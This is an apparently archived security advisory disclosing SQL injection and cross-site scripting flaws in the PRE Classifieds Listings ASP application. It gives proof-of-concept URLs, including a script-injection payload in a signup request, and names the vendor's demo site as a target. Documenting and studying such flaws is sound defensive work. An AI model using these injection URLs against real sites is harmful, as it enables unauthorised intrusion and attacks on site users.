PRE Classifieds Listings SQL,XSS

2009-08-04 / 2009-08-05

Credit: Pouya_Server

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-6887 | CVE-2008-6888 | CVE-2010-1369 | CVE-2010-1370 | CVE-2010-1371

CWE: CWE-89

#########################################################
---------------------------------------------------------
Portal Name: PRE Classifieds Listings
Vendor : http://www.preproject.com/
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (SQL,XSS)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/[Path]/home/detailad.asp?siteid=[SQL]


[XSS]:
http://site.com/[Path]/home/signup.asp?full_name=pouya.s3rver@gmail.com&email=111-222-1933email@address.tst&pass=111-222-1933email@address.tst&address=</textarea><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&phone=111-222-1933email@address.com&state=0&hide_email=on&url_add=111-222-1933email@address.tst&Submit=SignUp&addit=start


---------------------------------

Victem :
http://preproject.com/pclasp/

Referencje:

http://xforce.iss.net/xforce/xfdb/47006

http://www.securityfocus.com/bid/32566

http://packetstormsecurity.org/0812-exploits/preclass-sqlxss.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

PRE Classifieds Listings SQL,XSS

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.